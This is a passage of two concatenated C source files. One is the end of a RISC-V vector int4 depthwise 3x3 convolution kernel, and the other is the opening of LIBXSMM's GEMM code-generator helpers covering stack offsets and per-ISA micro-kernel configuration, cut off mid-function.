_acc0 = vwmacc_vx_i32m4(_acc0, k11, _r1_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k12, _r1_2_9_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k10, _r2_0_7_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k11, _r2_1_8_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k12, _r2_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k20, _r2_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k21, _r2_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k22, _r2_2_9_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k20, _r3_0_7_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k21, _r3_1_8_w, vl);
_acc1 = vwmacc_vx_i32m4(_acc1, k22, _r3_2_9_w, vl);
vint8m1_t _res0, _res1;
if (kernel->quant_channel > 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
_res1 = requantize_m4(_acc1, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
} else if (kernel->quant_channel == 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
_res1 = requantize_m4(_acc1, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
}
vsse8_v_i8m1(outptr0, in_c * sizeof(int8_t), _res0, vl);
vsse8_v_i8m1(outptr1, in_c * sizeof(int8_t), _res1, vl);
r0 += vl * in_c;
r1 += vl * in_c;
r2 += vl * in_c;
r3 += vl * in_c;
outptr0 += vl * in_c;
outptr1 += vl * in_c;
w -= vl;
}
r0 += (2 + in_w) * in_c;
r1 += (2 + in_w) * in_c;
r2 += (2 + in_w) * in_c;
r3 += (2 + in_w) * in_c;
outptr0 += out_w * in_c;
outptr1 += out_w * in_c;
}
for (; h < out_h; h++) {
int w = out_w;
// h2w8 loop
while (w > 0) {
vl = vsetvl_e32m4(w);
vint32m4_t _acc0 = vmv_v_x_i32m4(bias0, vl);
vint8m1_t _r0_0_7 = vlse8_v_i8m1(r0, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_1_8 = vlse8_v_i8m1(r0 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r0_2_9 = vlse8_v_i8m1(r0 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_0_7 = vlse8_v_i8m1(r1, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_1_8 = vlse8_v_i8m1(r1 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r1_2_9 = vlse8_v_i8m1(r1 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_0_7 = vlse8_v_i8m1(r2, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_1_8 = vlse8_v_i8m1(r2 + 1 * in_c, in_c * sizeof(int8_t), vl);
vint8m1_t _r2_2_9 = vlse8_v_i8m1(r2 + 2 * in_c, in_c * sizeof(int8_t), vl);
vint16m2_t _r0_0_7_w = vwadd_vx_i16m2(_r0_0_7, 0, vl); // widen 8 -> 16
vint16m2_t _r0_1_8_w = vwadd_vx_i16m2(_r0_1_8, 0, vl);
vint16m2_t _r0_2_9_w = vwadd_vx_i16m2(_r0_2_9, 0, vl);
vint16m2_t _r1_0_7_w = vwadd_vx_i16m2(_r1_0_7, 0, vl);
vint16m2_t _r1_1_8_w = vwadd_vx_i16m2(_r1_1_8, 0, vl);
vint16m2_t _r1_2_9_w = vwadd_vx_i16m2(_r1_2_9, 0, vl);
vint16m2_t _r2_0_7_w = vwadd_vx_i16m2(_r2_0_7, 0, vl);
vint16m2_t _r2_1_8_w = vwadd_vx_i16m2(_r2_1_8, 0, vl);
vint16m2_t _r2_2_9_w = vwadd_vx_i16m2(_r2_2_9, 0, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k00, _r0_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k01, _r0_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k02, _r0_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k10, _r1_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k11, _r1_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k12, _r1_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k20, _r2_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k21, _r2_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k22, _r2_2_9_w, vl);
vint8m1_t _res0;
if (kernel->quant_channel > 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
} else if (kernel->quant_channel == 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
}
vsse8_v_i8m1(outptr0, in_c * sizeof(int8_t), _res0, vl);
r0 += vl * in_c;
r1 += vl * in_c;
r2 += vl * in_c;
outptr0 += vl * in_c;
w -= vl;
}
}
}
csi_nn_rvv_int8_to_int4(output_tran_buf, output_data, out_h * out_w * in_c);
csi_mem_free(input_padd_buf);
csi_mem_free(kernel_tran_buf);
csi_mem_free(output_tran_buf);
return CSINN_TRUE;
}
int csi_nn_rvv_dwconv3x3s2_int4(struct csi_tensor *input, struct csi_tensor *output,
struct csi_tensor *kernel, struct csi_tensor *bias,
struct conv2d_params *params)
{
int8_t *input_data = (int8_t *)input->data;
int8_t *output_data = (int8_t *)output->data;
int8_t *kernel_data = (int8_t *)kernel->data;
int32_t *bias_data = (int32_t *)bias->data;
int32_t batch = input->dim[0];
int32_t in_h = input->dim[1];
int32_t in_w = input->dim[2];
int32_t in_c = input->dim[3];
int32_t out_h = output->dim[1];
int32_t out_w = output->dim[2];
int32_t out_c = output->dim[3];
int8_t *input_padd_buf = (int8_t *)csi_mem_alloc((in_h + params->pad_top + params->pad_down) *
(in_w + params->pad_left + params->pad_right) *
in_c * sizeof(int8_t));
csi_nn_rvv_pad_input_int4_trans_int8(
input_data, input_padd_buf, in_c, in_h, in_w, in_h + params->pad_top + params->pad_down,
in_w + params->pad_left + params->pad_right, params->pad_top, params->pad_left,
input->qinfo->zero_point);
int8_t *kernel_tran_buf = (int8_t *)csi_mem_alloc(9 * in_c * sizeof(int8_t));
int8_t *output_tran_buf = (int8_t *)csi_mem_alloc(out_h * out_w * out_c * sizeof(int8_t));
csi_nn_rvv_int4_trans_int8(kernel_data, kernel_tran_buf, 9 * in_c);
in_h = in_h + params->pad_top + params->pad_down;
in_w = in_w + params->pad_left + params->pad_right;
int tailstep = (in_w - 2 * out_w + in_w) * in_c;
#pragma omp parallel for num_threads(1)
for (int c = 0; c < in_c; c++) {
int8_t *outptr0 = output_tran_buf + c;
int32_t bias0 = bias_data[c];
int8_t *img0 = input_padd_buf + c;
int8_t *r0 = img0;
int8_t *r1 = r0 + in_w * in_c;
int8_t *r2 = r1 + in_w * in_c;
const int8_t *kernel0 = kernel_tran_buf + c;
int8_t k00 = kernel0[0];
int8_t k01 = kernel0[1 * in_c];
int8_t k02 = kernel0[2 * in_c];
int8_t k10 = kernel0[3 * in_c];
int8_t k11 = kernel0[4 * in_c];
int8_t k12 = kernel0[5 * in_c];
int8_t k20 = kernel0[6 * in_c];
int8_t k21 = kernel0[7 * in_c];
int8_t k22 = kernel0[8 * in_c];
int vl;
for (int h = 0; h < out_h; h++) {
int w = out_w;
while (w > 0) {
vl = vsetvl_e32m4(w);
vint32m4_t _acc0 = vmv_v_x_i32m4(bias0, vl);
vint8m1_t _r0_0_7 = vlse8_v_i8m1(r0, 2 * in_c * sizeof(int8_t), vl);
r0 += in_c;
vint8m1_t _r0_1_8 = vlse8_v_i8m1(r0, 2 * in_c * sizeof(int8_t), vl);
r0 += in_c;
vint8m1_t _r0_2_9 = vlse8_v_i8m1(r0, 2 * in_c * sizeof(int8_t), vl);
r0 += (vl - 1) * 2 * in_c;
vint8m1_t _r1_0_7 = vlse8_v_i8m1(r1, 2 * in_c * sizeof(int8_t), vl);
r1 += in_c;
vint8m1_t _r1_1_8 = vlse8_v_i8m1(r1, 2 * in_c * sizeof(int8_t), vl);
r1 += in_c;
vint8m1_t _r1_2_9 = vlse8_v_i8m1(r1, 2 * in_c * sizeof(int8_t), vl);
r1 += (vl - 1) * 2 * in_c;
vint8m1_t _r2_0_7 = vlse8_v_i8m1(r2, 2 * in_c * sizeof(int8_t), vl);
r2 += in_c;
vint8m1_t _r2_1_8 = vlse8_v_i8m1(r2, 2 * in_c * sizeof(int8_t), vl);
r2 += in_c;
vint8m1_t _r2_2_9 = vlse8_v_i8m1(r2, 2 * in_c * sizeof(int8_t), vl);
r2 += (vl - 1) * 2 * in_c;
vint16m2_t _r0_0_7_w = vwadd_vx_i16m2(_r0_0_7, 0, vl); // widen 8 -> 16
vint16m2_t _r0_1_8_w = vwadd_vx_i16m2(_r0_1_8, 0, vl);
vint16m2_t _r0_2_9_w = vwadd_vx_i16m2(_r0_2_9, 0, vl);
vint16m2_t _r1_0_7_w = vwadd_vx_i16m2(_r1_0_7, 0, vl);
vint16m2_t _r1_1_8_w = vwadd_vx_i16m2(_r1_1_8, 0, vl);
vint16m2_t _r1_2_9_w = vwadd_vx_i16m2(_r1_2_9, 0, vl);
vint16m2_t _r2_0_7_w = vwadd_vx_i16m2(_r2_0_7, 0, vl);
vint16m2_t _r2_1_8_w = vwadd_vx_i16m2(_r2_1_8, 0, vl);
vint16m2_t _r2_2_9_w = vwadd_vx_i16m2(_r2_2_9, 0, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k00, _r0_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k01, _r0_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k02, _r0_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k10, _r1_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k11, _r1_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k12, _r1_2_9_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k20, _r2_0_7_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k21, _r2_1_8_w, vl);
_acc0 = vwmacc_vx_i32m4(_acc0, k22, _r2_2_9_w, vl);
vint8m1_t _res0;
if (kernel->quant_channel > 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[c].multiplier,
kernel->qinfo[c].shift, output->qinfo->zero_point, vl);
} else if (kernel->quant_channel == 1) {
_res0 = requantize_m4(_acc0, kernel->qinfo[0].multiplier,
kernel->qinfo[0].shift, output->qinfo->zero_point, vl);
}
vsse8_v_i8m1(outptr0, in_c * sizeof(int8_t), _res0, vl);
outptr0 += vl * in_c;
w -= vl;
}
r0 += tailstep;
r1 += tailstep;
r2 += tailstep;
}
}
csi_nn_rvv_int8_to_int4(output_tran_buf, output_data, out_h * out_w * in_c);
csi_mem_free(input_padd_buf);
csi_mem_free(kernel_tran_buf);
csi_mem_free(output_tran_buf);
return CSINN_TRUE;
} |
generator_gemm_common.c | /******************************************************************************
* Copyright (c) Intel Corporation - All rights reserved. *
* This file is part of the LIBXSMM library. *
* *
* For information on the license, see the LICENSE file. *
* Further information: https://github.com/hfp/libxsmm/ *
* SPDX-License-Identifier: BSD-3-Clause *
******************************************************************************/
/* Alexander Heinecke (Intel Corp.)
******************************************************************************/
#include "generator_gemm_common.h"
#include "generator_common.h"
#include "generator_x86_instructions.h"
#include "libxsmm_main.h"
LIBXSMM_API_INTERN
int libxsmm_generator_gemm_get_rbp_relative_offset( libxsmm_gemm_stack_var stack_var ) {
/* The stack at exit of setup looks like this:
*
* 10th param (if applicable) <-- RBP+40
* 9th param (if applicable) <-- RBP+32
* 8th param (if applicable) <-- RBP+24
* 7th param (if applicable) <-- RBP+16
* Return address <-- RBP+8
* Entry/saved RBP <-- RBP
* prefetch A ptr <-- RBP-8
* prefetch B ptr <-- RBP-16
* Offset A array ptr <-- RBP-24
* Offset B array ptr <-- RBP-32
* Int8 scaling factor <-- RBP-40
* GEMM_scratch ptr in stack (to be filled) <-- RBP-48
* Eltwise bias ptr <-- RBP-56
* Eltwise output_ptr <-- RBP-64
* Eltwise buf1_ptr <-- RBP-72
* Eltwise buf2_ptr <-- RBP-80
*
* */
switch ( stack_var ) {
case LIBXSMM_GEMM_STACK_VAR_NONE:
return 0;
case LIBXSMM_GEMM_STACK_VAR_PFA_PTR:
return -8;
case LIBXSMM_GEMM_STACK_VAR_PFB_PTR:
return -16;
case LIBXSMM_GEMM_STACK_VAR_A_OFFS_BRGEMM_PTR:
return -24;
case LIBXSMM_GEMM_STACK_VAR_B_OFFS_BRGEMM_PTR:
return -32;
case LIBXSMM_GEMM_STACK_VAR_INT8_SCF:
return -40;
case LIBXSMM_GEMM_STACK_VAR_GEMM_SCRATCH_PTR:
return -48;
case LIBXSMM_GEMM_STACK_VAR_ELT_BIAS_PTR:
return -56;
case LIBXSMM_GEMM_STACK_VAR_ELT_OUTPUT_PTR:
return -64;
case LIBXSMM_GEMM_STACK_VAR_ELT_RELU_BITMASK_PTR:
return -72;
case LIBXSMM_GEMM_STACK_VAR_ELT_BUF1:
return -72;
case LIBXSMM_GEMM_STACK_VAR_ELT_BUF2:
return -80;
case LIBXSMM_GEMM_STACK_VAR_TRANS_EXT_BUF_B:
return -72;
case LIBXSMM_GEMM_STACK_VAR_TRANS_EXT_BUF_C:
return -80;
case LIBXSMM_GEMM_STACK_VAR_ELT_BITMAP_PTR:
return -72;
case LIBXSMM_GEMM_STACK_VAR_ELT_DECOMPRESS_BUF:
return -80;
case LIBXSMM_GEMM_STACK_VAR_ARG_7:
return 16;
case LIBXSMM_GEMM_STACK_VAR_ARG_8:
return 24;
case LIBXSMM_GEMM_STACK_VAR_ARG_9:
return 32;
case LIBXSMM_GEMM_STACK_VAR_ARG_10:
return 40;
default:
return 0;
}
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_getval_stack_var( libxsmm_generated_code* io_generated_code,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
libxsmm_gemm_stack_var stack_var,
unsigned int i_gp_reg ) {
int offset = libxsmm_generator_gemm_get_rbp_relative_offset(stack_var);
/* make sure we requested a legal stack var */
if (offset == 0) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_GENERAL );
return;
}
libxsmm_x86_instruction_alu_mem( io_generated_code, i_micro_kernel_config->alu_mov_instruction, LIBXSMM_X86_GP_REG_RBP, LIBXSMM_X86_GP_REG_UNDEF, 0, offset, i_gp_reg, 0 );
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_setval_stack_var( libxsmm_generated_code* io_generated_code,
const libxsmm_micro_kernel_config* i_micro_kernel_config,
libxsmm_gemm_stack_var stack_var,
unsigned int i_gp_reg ) {
int offset = libxsmm_generator_gemm_get_rbp_relative_offset(stack_var);
/* make sure we requested to set a legal stack var */
if (offset >= 0) {
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_GENERAL );
return;
}
libxsmm_x86_instruction_alu_mem( io_generated_code, i_micro_kernel_config->alu_mov_instruction, LIBXSMM_X86_GP_REG_RBP, LIBXSMM_X86_GP_REG_UNDEF, 0, offset, i_gp_reg, 1 );
}
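/* Usage sketch (illustrative, not taken from this file): a kernel generator
 * can fetch the GEMM scratch pointer saved at RBP-48 into a scratch GP
 * register; the choice of RAX here is an assumption made for the example:
 *
 *   libxsmm_generator_gemm_getval_stack_var( io_generated_code, i_micro_kernel_config,
 *       LIBXSMM_GEMM_STACK_VAR_GEMM_SCRATCH_PTR, LIBXSMM_X86_GP_REG_RAX );
 */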
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_init_micro_kernel_config_fullvector( libxsmm_micro_kernel_config* io_micro_kernel_config,
const unsigned int i_arch,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_use_masking_a_c ) {
memset(io_micro_kernel_config, 0, sizeof(*io_micro_kernel_config)); /* avoid warning "maybe used uninitialized" */
if ( (i_arch < LIBXSMM_X86_SSE3) || (i_arch > LIBXSMM_X86_ALLFEAT) ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_GENERIC;
io_micro_kernel_config->vector_reg_count = 0;
io_micro_kernel_config->use_masking_a_c = 0;
io_micro_kernel_config->vector_name = 'a';
io_micro_kernel_config->vector_length = 0;
io_micro_kernel_config->datatype_size = 0;
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_UNDEF;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_UNDEF;
} else if ( i_arch <= LIBXSMM_X86_SSE4 ) {
io_micro_kernel_config->instruction_set = LIBXSMM_X86_SSE3;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'x';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 2;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVDDUP;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVAPD;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULPD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDPD;
} else {
io_micro_kernel_config->vector_length = 4;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_MOVSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_SHUFPS;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVAPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVAPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_MOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_MOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_XORPS;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_MULPS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_ADDPS;
}
} else if ( i_arch <= LIBXSMM_X86_AVX2 ) {
io_micro_kernel_config->instruction_set = i_arch;
io_micro_kernel_config->vector_reg_count = 16;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'y';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 4;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPD;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPD;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
}
} else {
io_micro_kernel_config->vector_length = 8;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VXORPS;
if ( i_arch == LIBXSMM_X86_AVX ) {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VMULPS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else {
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
}
}
} else if ( i_arch <= LIBXSMM_X86_ALLFEAT ) {
io_micro_kernel_config->instruction_set = i_arch;
io_micro_kernel_config->vector_reg_count = 32;
io_micro_kernel_config->use_masking_a_c = i_use_masking_a_c;
io_micro_kernel_config->vector_name = 'z';
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 8;
io_micro_kernel_config->datatype_size = 8;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPD;
} else {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVAPD;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPD;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPD;
} else if ( LIBXSMM_GEMM_PRECISION_F32 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VBROADCASTSS;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VFMADD231PS;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VADDPS;
} else if ( LIBXSMM_GEMM_PRECISION_I16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
/* C is 32bit, so we treat all 3 matrices as 32bit element arrays */
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VPBROADCASTD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
if ( (i_use_masking_a_c == 0) ) {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVNTPS;
} else {
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
}
} else {
io_micro_kernel_config->c_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
io_micro_kernel_config->c_vmove_nts_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->vxor_instruction = LIBXSMM_X86_INSTR_VPXORD;
io_micro_kernel_config->vmul_instruction = LIBXSMM_X86_INSTR_VPDPWSSD;
io_micro_kernel_config->vadd_instruction = LIBXSMM_X86_INSTR_VPADDD;
} else if ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
/* C is 32bit, so we treat all 3 matrices as 32bit element arrays */
io_micro_kernel_config->vector_length = 16;
io_micro_kernel_config->datatype_size = 4;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_A & i_xgemm_desc->flags) != 0 ) {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVAPS;
} else {
io_micro_kernel_config->a_vmove_instruction = LIBXSMM_X86_INSTR_VMOVUPS;
}
io_micro_kernel_config->b_vmove_instruction = LIBXSMM_X86_INSTR_VPBROADCASTD;
io_micro_kernel_config->b_shuff_instruction = LIBXSMM_X86_INSTR_UNDEF;
if ( (LIBXSMM_GEMM_FLAG_ALIGN_C & i_xgemm_desc->flags) != 0 ) {
